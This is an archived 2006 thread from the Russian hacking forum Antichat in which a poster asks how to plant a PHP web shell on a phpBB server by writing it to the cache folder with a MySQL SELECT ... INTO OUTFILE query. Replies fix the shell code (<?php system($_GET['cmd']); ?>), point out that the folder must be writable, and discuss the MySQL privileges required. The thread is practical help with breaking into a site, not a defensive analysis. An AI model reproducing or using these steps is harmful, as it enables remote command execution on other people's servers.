Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Заливка шелла через БД (https://forum.antichat.xyz/showthread.php?t=21192)

Tosic 01.07.2006 15:03

Заливка шелла через БД
 
подскажите пожалуйста как правильно выкачать шелл из БД в файл на сервере, мои попытки не увенчались успехом, так как при выборке в файл чего-то символы заменяются их кодом
вот пример как я вытаскивал шелл
SELECT cat_title INTO OUTFILE 'раскрытый путь/phpbb/cache/shell.php' FROM phpbb_categories where cat_id=1; - это пример
как лучше оформить запрос или что нужно вписать в БД
текст шелла: <?p system("$_GET[cmd]"); ?>

1ten0.0net1 03.07.2006 00:36

1) Проверь - разрешена ли запись в папку cache;
2) Шелл - не <?p... , а <?php...;
3) Кавычками обрамлять надо cmd, а не весь текст в скобках (да и то невсегда).

banall 03.07.2006 07:00

Цитата:

Сообщение от 1ten0.0net1
1) Проверь - разрешена ли запись в папку cache;
2) Шелл - не <?p... , а <?php...;
3) Кавычками обрамлять надо cmd, а не весь текст в скобках (да и то невсегда).

Нифига не получиться форум в сафе режиме можно только через фтп или ищи открытую папку можно не на форуме. Т.к. весь форум закрыт на запись.

ZaCo 03.07.2006 13:02

>>Нифига не получиться форум в сафе режиме
никакой связи между сафе модом в пхп и мускл сервером нет. запросы отсылаются? - отсылаюстся. стало быть достаточно чтобы текущий юзер мускул сервера обльадал необходимыми привилегиями - о них уже писали, и не только на форуме.

Dw@d 03.07.2006 21:59

Цитата:

<?p system("$_GET[cmd]"); ?>
лол )))))) такой код никогда и не заработает

Zadoxlik 03.07.2006 22:42

Как я понял, там стоит phpBB. Тоды тебе сюда:
1
2

Tosic 04.07.2006 08:53

спасибо, что указали на ошибки, так как я недавно практикую с хакингом, просто ради интереса.
как я понял код должен быть таким:
<?php system($_GET["cmd"]); ?>
правильно?

Nova 04.07.2006 09:42

Лол млин учись нормально код делать

или так
Код:

<? system(GET['cmd']); ?>
или так
Код:

<?php system(GET['cmd']); ?>


Время: 00:38